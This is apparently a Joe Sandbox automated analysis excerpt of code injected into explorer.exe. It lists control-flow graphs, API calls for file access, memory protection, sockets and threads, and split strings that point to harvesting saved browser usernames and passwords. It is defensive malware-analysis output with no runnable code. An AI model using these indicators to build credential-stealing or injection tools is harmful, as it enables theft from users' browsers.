
Control-flow Graph

control_flow_graph 303 8cdd232-8cdd256 304 8cdd8bd-8cdd8cd 303->304 305 8cdd25c-8cdd260 303->305 305->304 306 8cdd266-8cdd2a0 305->306 307 8cdd2bf 306->307 308 8cdd2a2-8cdd2a6 306->308 310 8cdd2c6 307->310 308->307 309 8cdd2a8-8cdd2ac 308->309 311 8cdd2ae-8cdd2b2 309->311 312 8cdd2b4-8cdd2b8 309->312 313 8cdd2cb-8cdd2cf 310->313 311->310 312->313 314 8cdd2ba-8cdd2bd 312->314 315 8cdd2f9-8cdd30b 313->315 316 8cdd2d1-8cdd2f7 call 8cdd942 313->316 314->313 320 8cdd378 315->320 321 8cdd30d-8cdd332 315->321 316->315 316->320 324 8cdd37a-8cdd3a0 320->324 322 8cdd334-8cdd33b 321->322 323 8cdd3a1-8cdd3a8 321->323 325 8cdd33d-8cdd360 call 8cdd942 322->325 326 8cdd366-8cdd370 322->326 327 8cdd3aa-8cdd3d3 call 8cdd942 323->327 328 8cdd3d5-8cdd3dc 323->328 325->326 326->320 332 8cdd372-8cdd373 326->332 327->320 327->328 329 8cdd3de-8cdd40a call 8cdd942 328->329 330 8cdd410-8cdd458 NtCreateFile call 8cdd172 328->330 329->320 329->330 339 8cdd45d-8cdd45f 330->339 332->320 339->320 340 8cdd465-8cdd46d 339->340 340->320 341 8cdd473-8cdd476 340->341 342 8cdd478-8cdd481 341->342 343 8cdd486-8cdd48d 341->343 342->324 344 8cdd48f-8cdd4b8 call 8cdd942 343->344 345 8cdd4c2-8cdd4ec 343->345 344->320 350 8cdd4be-8cdd4bf 344->350 351 8cdd8ae-8cdd8b8 345->351 352 8cdd4f2-8cdd4f5 345->352 350->345 351->320 353 8cdd4fb-8cdd4fe 352->353 354 8cdd604-8cdd611 352->354 355 8cdd55e-8cdd561 353->355 356 8cdd500-8cdd507 353->356 354->324 361 8cdd567-8cdd572 355->361 362 8cdd616-8cdd619 355->362 358 8cdd509-8cdd532 call 8cdd942 356->358 359 8cdd538-8cdd559 356->359 358->320 358->359 366 8cdd5e9-8cdd5fa 359->366 367 8cdd574-8cdd59d call 8cdd942 361->367 368 8cdd5a3-8cdd5a6 361->368 364 8cdd61f-8cdd626 362->364 365 8cdd6b8-8cdd6bb 362->365 373 8cdd628-8cdd651 call 8cdd942 364->373 374 8cdd657-8cdd66b call 8cdee92 364->374 370
8cdd6bd-8cdd6c4 365->370 371 8cdd739-8cdd73c 365->371 366->354 367->320 367->368 368->320 369 8cdd5ac-8cdd5b6 368->369 369->320 377 8cdd5bc-8cdd5e6 369->377 378 8cdd6f5-8cdd734 370->378 379 8cdd6c6-8cdd6ef call 8cdd942 370->379 381 8cdd7c4-8cdd7c7 371->381 382 8cdd742-8cdd749 371->382 373->320 373->374 374->320 391 8cdd671-8cdd6b3 374->391 377->366 401 8cdd894-8cdd8a9 378->401 379->351 379->378 381->320 387 8cdd7cd-8cdd7d4 381->387 384 8cdd74b-8cdd774 call 8cdd942 382->384 385 8cdd77a-8cdd7bf 382->385 384->351 384->385 385->401 392 8cdd7fc-8cdd803 387->392 393 8cdd7d6-8cdd7f6 call 8cdd942 387->393 391->324 399 8cdd82b-8cdd835 392->399 400 8cdd805-8cdd825 call 8cdd942 392->400 393->392 399->351 402 8cdd837-8cdd83e 399->402 400->399 401->324 402->351 406 8cdd840-8cdd886 402->406 406->401
APIs
Strings
Memory Dump Source
• Source File: 00000009.00000002.930049677.0000000008C80000.00000040.80000000.00040000.00000000.sdmp, Offset: 08C80000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_8c80000_explorer.jbxd
Similarity
• API ID: CreateFile
• String ID: `
• API String ID: 823142352-2679148245
• Opcode ID: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
• Instruction ID: 26bc5fa88aff633eb195eeed6806f725c8c547b8568cd3ed69cb5dd4b209391b
• Opcode Fuzzy Hash: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
• Instruction Fuzzy Hash: AA224D70A18F099FDB59EF68C4946AAB7F1FB98302F40462ED65ED3250DB30E552CB81

Control-flow Graph

control_flow_graph 459 8cdee12-8cdee38 460 8cdee45-8cdee6e NtProtectVirtualMemory 459->460 461 8cdee40 call 8cdd942 459->461 462 8cdee7d-8cdee8f 460->462 463 8cdee70-8cdee7c 460->463 461->460
APIs
• NtProtectVirtualMemory.NTDLL ref: 08CDEE67
Memory Dump Source
• Source File: 00000009.00000002.930049677.0000000008C80000.00000040.80000000.00040000.00000000.sdmp, Offset: 08C80000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_8c80000_explorer.jbxd
Similarity
• API ID: MemoryProtectVirtual
• String ID:
• API String ID: 2706961497-0
• Opcode ID: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
• Instruction ID: ca54507ec25262086d96473167f66559c5c1bc764bc45095f8ea291ea2092ce7
• Opcode Fuzzy Hash: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
• Instruction Fuzzy Hash: D801B134668B484F8B88EF6CD48412AB7E4FBCE315F000B3EE99AC7250EB70C5414742

Control-flow Graph

control_flow_graph 464 8cdee0a-8cdee6e call 8cdd942 NtProtectVirtualMemory 467 8cdee7d-8cdee8f 464->467 468 8cdee70-8cdee7c 464->468
APIs
• NtProtectVirtualMemory.NTDLL ref: 08CDEE67
Memory Dump Source
• Source File: 00000009.00000002.930049677.0000000008C80000.00000040.80000000.00040000.00000000.sdmp, Offset: 08C80000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_8c80000_explorer.jbxd
Similarity
• API ID: MemoryProtectVirtual
• String ID:
• API String ID: 2706961497-0
• Opcode ID: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
• Instruction ID: d7ff074f071e40e2efc1c4a6290a2e21dbac9eda10e34f6a579a4b160226839b
• Opcode Fuzzy Hash: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
• Instruction Fuzzy Hash: B01A234628B884B8B48EB6C94452A6B3E5FBCE315F000B3EE99AC3241DB21D5024782

Control-flow Graph

APIs
• ObtainUserAgentString.URLMON ref: 08CD89A0
Strings
Memory Dump Source
• Source File: 00000009.00000002.930049677.0000000008C80000.00000040.80000000.00040000.00000000.sdmp, Offset: 08C80000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_8c80000_explorer.jbxd
Similarity
• API ID: AgentObtainStringUser
• String ID: User-Agent: $nt: $on.d$urlmon.dll
• API String ID: 2681117516-319646191
• Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
• Instruction ID: 338b0d1330069b54e0228b2b608cbfd786ac712b3c5b24f89f4f9e12cee5e5a3
• Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
• Instruction Fuzzy Hash: A2319C71614B0C8BCB44FFA8D8847EEB7F1FB58216F40422AD95ED7240DE7896458789

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • ObtainUserAgentString.URLMON ref: 08CD89A0
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000009.00000002.930049677.0000000008C80000.00000040.80000000.00040000.00000000.sdmp, Offset: 08C80000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_8c80000_explorer.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AgentObtainStringUser
                                                                                                                                                                                    • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                                                                                                                                                                    • API String ID: 2681117516-319646191
                                                                                                                                                                                    • Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                                                                                                                                                                    • Instruction ID: 42bf611b71940f2b45bf10e286d26ee157be5e99eb93873c53e9112b8a730839
                                                                                                                                                                                    • Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                                                                                                                                                                    • Instruction Fuzzy Hash: CC218F70A14B4C8ACB05FFA8C8847EEBBB1FB58206F40422ED55AD7340DE7496458789

                                                                                                                                                                                    Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 00000009.00000002.930049677.0000000008C80000.00000040.80000000.00040000.00000000.sdmp, Offset: 08C80000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_8c80000_explorer.jbxd
Similarity
• API ID: CreateMutex
• String ID: .dll$el32$kern
• API String ID: 1964310414-1222553051
• Opcode ID: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
• Instruction ID: 5261e2d26b0460bdaf04e423e006e22a855f6ecc28f3b922d1e18cebf7967cb3
• Opcode Fuzzy Hash: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
• Instruction Fuzzy Hash: ED415E74918A088FDB54FFA8C4947AD77F0FF98301F04427AC94ADB255DE309946CB85

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 00000009.00000002.930049677.0000000008C80000.00000040.80000000.00040000.00000000.sdmp, Offset: 08C80000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_8c80000_explorer.jbxd
Similarity
• API ID: CreateMutex
• String ID: .dll$el32$kern
• API String ID: 1964310414-1222553051
• Opcode ID: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
• Instruction ID: c1279728d6dd9f7901e56d95b35cf9d30f9c0556a4521995feba44f244cc44b6
• Opcode Fuzzy Hash: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
• Instruction Fuzzy Hash: F0414C74918A088FDB44EFA8C494BAD77F0FF98301F44417AC94EDB255DE309946CB85

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 00000009.00000002.930049677.0000000008C80000.00000040.80000000.00040000.00000000.sdmp, Offset: 08C80000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_8c80000_explorer.jbxd
Similarity
• API ID: connect
• String ID: conn$ect
• API String ID: 1959786783-716201944
• Opcode ID: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
• Instruction ID: d30e56ac61c83965360f0c5e3e5001e10bd6178d163d5d21430a97741cd6bd3f
• Opcode Fuzzy Hash: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
• Instruction Fuzzy Hash: E7015E30618B188FCB84EF5CE088B55B7E0FB58315F1545AED90DCB226CB74C9818BC2

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 00000009.00000002.930049677.0000000008C80000.00000040.80000000.00040000.00000000.sdmp, Offset: 08C80000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_8c80000_explorer.jbxd
Similarity
• API ID: connect
• String ID: conn$ect
• API String ID: 1959786783-716201944
• Opcode ID: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
• Instruction ID: c7403e893eaa379e485d6c586ce38ba92f0c13708aeaff43713d535e6ec5f050
• Opcode Fuzzy Hash: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
• Instruction Fuzzy Hash: 4B012C70618A1C8FCB88EF5CE088B55B7E0FB59315F1541AEA90DCB226CB74C9818BC2

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 00000009.00000002.930049677.0000000008C80000.00000040.80000000.00040000.00000000.sdmp, Offset: 08C80000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_8c80000_explorer.jbxd
Similarity
• API ID: send
• String ID: send
• API String ID: 2809346765-2809346765
• Opcode ID: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
• Instruction ID: 48cc7484f0b4cf38c5312ed73b92bdd79d9f2a192bb3bced9caf3ab2fb7359c1
• Opcode Fuzzy Hash: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
• Instruction Fuzzy Hash: DA011270518A188FDB84EF5CD048B2577E0EB58315F1645AED95DCB266CA70D8818B85

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 00000009.00000002.930049677.0000000008C80000.00000040.80000000.00040000.00000000.sdmp, Offset: 08C80000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_8c80000_explorer.jbxd
Similarity
• API ID: socket
• String ID: sock
• API String ID: 98920635-2415254727
• Opcode ID: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
• Instruction ID: 08fdef83da2582614fc05bdf6a3dbca06fc1005e883a5f9908493938d6791304
• Opcode Fuzzy Hash: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
• Instruction Fuzzy Hash: 510121706187188FCB84EF5CD048B54BBE0FB59315F1545ADE55ECB266C7B0C9828B86

Control-flow Graph

APIs
Memory Dump Source
• Source File: 00000009.00000002.930049677.0000000008C80000.00000040.80000000.00040000.00000000.sdmp, Offset: 08C80000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_8c80000_explorer.jbxd
Similarity
• API ID: Sleep
• String ID:
• API String ID: 3472027048-0
• Opcode ID: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
• Instruction ID: a2d62f7e8a461386f1d9ea0bb20d3271b3f825e09aad45332aab793fcc6f9f69
• Opcode Fuzzy Hash: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
• Instruction Fuzzy Hash: F8316B75604B49DFDB64FF2980882A9B7B5FB54302F44467ECA2DCB206CB34A152CFA1
APIs
Memory Dump Source
• Source File: 00000009.00000002.930049677.0000000008C80000.00000040.80000000.00040000.00000000.sdmp, Offset: 08C80000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_8c80000_explorer.jbxd
Similarity
• API ID: CreateThread
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2422867632-0
                                                                                                                                                                                    • Opcode ID: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
                                                                                                                                                                                    • Instruction ID: 4f7e0997c44db32c6280f344873ea0f029b7ed8ecf5bd9b08cba478e7fa6148f
                                                                                                                                                                                    • Opcode Fuzzy Hash: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
                                                                                                                                                                                    • Instruction Fuzzy Hash: 5BF0C834668B484FD784FB2CD44562AB3E0FBE8215F44053E9A4EC3255DE25C5424755
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000009.00000002.929970443.0000000008170000.00000040.00000001.00040000.00000000.sdmp, Offset: 08170000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_8170000_explorer.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: .dll$32.d$M$S$dll$el32$kern$ll$net.$user$wini
                                                                                                                                                                                    • API String ID: 0-393284711
                                                                                                                                                                                    • Opcode ID: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
                                                                                                                                                                                    • Instruction ID: 14d31900395fcb18c80a913f0b524009494bf668f11cf29eb8a79106fa52d5a5
                                                                                                                                                                                    • Opcode Fuzzy Hash: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
                                                                                                                                                                                    • Instruction Fuzzy Hash: 08E16A74628F488FC764EF68C498BAAB7E0FF58301F504A2E959BC7252DF70A505CB85
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000009.00000002.929970443.0000000008170000.00000040.00000001.00040000.00000000.sdmp, Offset: 08170000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_8170000_explorer.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: Fiel$Subm$d$dPas$dUse$e$encr$encr$form$guid$itUR$name$rnam$swor$user$ypte$ypte
                                                                                                                                                                                    • API String ID: 0-2916316912
                                                                                                                                                                                    • Opcode ID: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
                                                                                                                                                                                    • Instruction ID: 190f80a5a1523c24da9ba8db325855c1cd00b93268249070e147bb6203c61f46
                                                                                                                                                                                    • Opcode Fuzzy Hash: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
                                                                                                                                                                                    • Instruction Fuzzy Hash: 5FB17C30628B488EDB55EF68C489AEEB7F1FF98301F50491ED49AC7252EF7095058B86
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000009.00000002.929970443.0000000008170000.00000040.00000001.00040000.00000000.sdmp, Offset: 08170000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_8170000_explorer.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: 2$c$d$d$d$e$i$l$l$l$n$n$p$s$t$u$w
                                                                                                                                                                                    • API String ID: 0-1539916866
                                                                                                                                                                                    • Opcode ID: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
                                                                                                                                                                                    • Instruction ID: 7b6ef7e04e923aec5f1f223cd997425383e0ea0d58f8e095af595c22a45d34d1
                                                                                                                                                                                    • Opcode Fuzzy Hash: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
                                                                                                                                                                                    • Instruction Fuzzy Hash: 1841C270A18B088FDB14EF98A8457BDBBE2FB88701F00026ED509D3346DBB59D458BD6
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000009.00000002.929970443.0000000008170000.00000040.00000001.00040000.00000000.sdmp, Offset: 08170000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_8170000_explorer.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: D$[$[$[$[$[$]$]$b$c$e$l$l$n
                                                                                                                                                                                    • API String ID: 0-355182820
                                                                                                                                                                                    • Opcode ID: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
                                                                                                                                                                                    • Instruction ID: f5f4552bd2bb3f5494715fde4c65f1b055fa4493dfbb0e814eecd161ce4a1faf
                                                                                                                                                                                    • Opcode Fuzzy Hash: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
                                                                                                                                                                                    • Instruction Fuzzy Hash: 80C16A74228F098FC758EF68C489AEAF3E1FB94305F40462E959AC7251DF70A515CB86
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000009.00000002.929970443.0000000008170000.00000040.00000001.00040000.00000000.sdmp, Offset: 08170000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_8170000_explorer.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: .$0$c$n$r$r$r$r$r$r$r$r
                                                                                                                                                                                    • API String ID: 0-97273177
                                                                                                                                                                                    • Opcode ID: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
                                                                                                                                                                                    • Instruction ID: c8205f6ea5896b311039b7b45b200fd37276a623ea87ce68ea6b7f1c03446cda
                                                                                                                                                                                    • Opcode Fuzzy Hash: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
                                                                                                                                                                                    • Instruction Fuzzy Hash: F751D6315287488FD719DF18C8852AAB7E5FBC5701F50192EE8CBC7242DBB49906CF82
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000009.00000002.929970443.0000000008170000.00000040.00000001.00040000.00000000.sdmp, Offset: 08170000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_8170000_explorer.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
                                                                                                                                                                                    • API String ID: 0-639201278
                                                                                                                                                                                    • Opcode ID: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
                                                                                                                                                                                    • Instruction ID: f27b50cb37e4088d12280d304009ac1c9824fec7b3f3576ea0a8a99e3b97a330
                                                                                                                                                                                    • Opcode Fuzzy Hash: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
                                                                                                                                                                                    • Instruction Fuzzy Hash: 20C19F74628A198FC758EB68D459AAAB3E1FF98305F54432D950FC7352DF30AA02CB85
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000009.00000002.929970443.0000000008170000.00000040.00000001.00040000.00000000.sdmp, Offset: 08170000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_8170000_explorer.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
                                                                                                                                                                                    • API String ID: 0-639201278
                                                                                                                                                                                    • Opcode ID: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
                                                                                                                                                                                    • Instruction ID: aecf7b78064926a0ed2bf5504bc2240329fb9bca841afbee7aaf85693517bec6
                                                                                                                                                                                    • Opcode Fuzzy Hash: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
                                                                                                                                                                                    • Instruction Fuzzy Hash: AEC19F74628A198FC758EF68D499AAAB3E1FF98305F54432D950EC7352DF30A902CB85
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000009.00000002.929970443.0000000008170000.00000040.00000001.00040000.00000000.sdmp, Offset: 08170000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_8170000_explorer.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: UR$2$L: $Pass$User$name$word
                                                                                                                                                                                    • API String ID: 0-2058692283
                                                                                                                                                                                    • Opcode ID: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
                                                                                                                                                                                    • Instruction ID: 74c7a73cca293fbbad4bc4c310d2202e0faed0ad6ff8fe635a19e5ad72301191
                                                                                                                                                                                    • Opcode Fuzzy Hash: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
                                                                                                                                                                                    • Instruction Fuzzy Hash: EEA1A07061874C8BDB18EFA8D444BEEB7E1FF88311F40462DE48AD7292EF7095468B85
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000009.00000002.929970443.0000000008170000.00000040.00000001.00040000.00000000.sdmp, Offset: 08170000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_8170000_explorer.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: UR$2$L: $Pass$User$name$word
                                                                                                                                                                                    • API String ID: 0-2058692283
                                                                                                                                                                                    • Opcode ID: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
                                                                                                                                                                                    • Instruction ID: 6c541dd120486b261ae295609088ec3774f5120ecbff87f7b2b867aabded020f
                                                                                                                                                                                    • Opcode Fuzzy Hash: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
                                                                                                                                                                                    • Instruction Fuzzy Hash: 9D91817061874C8BDB18EFA8D444BEEB7E1FF88311F40462DE48AD7292EF7095468B85
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000009.00000002.929970443.0000000008170000.00000040.00000001.00040000.00000000.sdmp, Offset: 08170000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_8170000_explorer.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: $.$e$n$v
                                                                                                                                                                                    • API String ID: 0-1849617553
                                                                                                                                                                                    • Opcode ID: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
                                                                                                                                                                                    • Instruction ID: d451b0a8e9bb2ef1bc0563aea8155f56cee940fbec99e610db189f328339b625
                                                                                                                                                                                    • Opcode Fuzzy Hash: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
                                                                                                                                                                                    • Instruction Fuzzy Hash: 6F719235618B488FD758EFA8C4887AAB7F1FF58305F00062FD44AC7262EB75D9468B81
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000009.00000002.929970443.0000000008170000.00000040.00000001.00040000.00000000.sdmp, Offset: 08170000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_8170000_explorer.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: 2.dl$dll$l32.$ole3$shel
                                                                                                                                                                                    • API String ID: 0-1970020201
                                                                                                                                                                                    • Opcode ID: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
                                                                                                                                                                                    • Instruction ID: 91dd595d41e329c6005de86fe2bb807a8f0135e2a81fbd8952b7f4a3a4425ecc
                                                                                                                                                                                    • Opcode Fuzzy Hash: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
                                                                                                                                                                                    • Instruction Fuzzy Hash: 9F5190B0914B0C8FCB54EFA8D045AEEB7F1FF58301F40462E949AE7254EF7095418B89
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000009.00000002.929970443.0000000008170000.00000040.00000001.00040000.00000000.sdmp, Offset: 08170000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_8170000_explorer.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: 4$\$dll$ion.$vers
                                                                                                                                                                                    • API String ID: 0-1610437797
                                                                                                                                                                                    • Opcode ID: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
                                                                                                                                                                                    • Instruction ID: 9eaa872854384cffd53d20126d8281fb86a256252e890f74122dd448718345d6
                                                                                                                                                                                    • Opcode Fuzzy Hash: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
                                                                                                                                                                                    • Instruction Fuzzy Hash: 21417334218B8C8BDB65EF6898457EA73E4FF94301F454A2E994EC7241EF70D505CB82
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000009.00000002.929970443.0000000008170000.00000040.00000001.00040000.00000000.sdmp, Offset: 08170000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_8170000_explorer.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: 32.d$cli.$dll$sspi$user
                                                                                                                                                                                    • API String ID: 0-327345718
                                                                                                                                                                                    • Opcode ID: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
                                                                                                                                                                                    • Instruction ID: b2e209072fbd08ce9bf763c3351d9689d4405f1006a92a9172ef30e34b95b09a
                                                                                                                                                                                    • Opcode Fuzzy Hash: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
                                                                                                                                                                                    • Instruction Fuzzy Hash: 7B415C30A18E0D8FCB58EF6890A47AD77E1FF58316F40416EA90ED7261DF71C5428B86
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000009.00000002.929970443.0000000008170000.00000040.00000001.00040000.00000000.sdmp, Offset: 08170000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
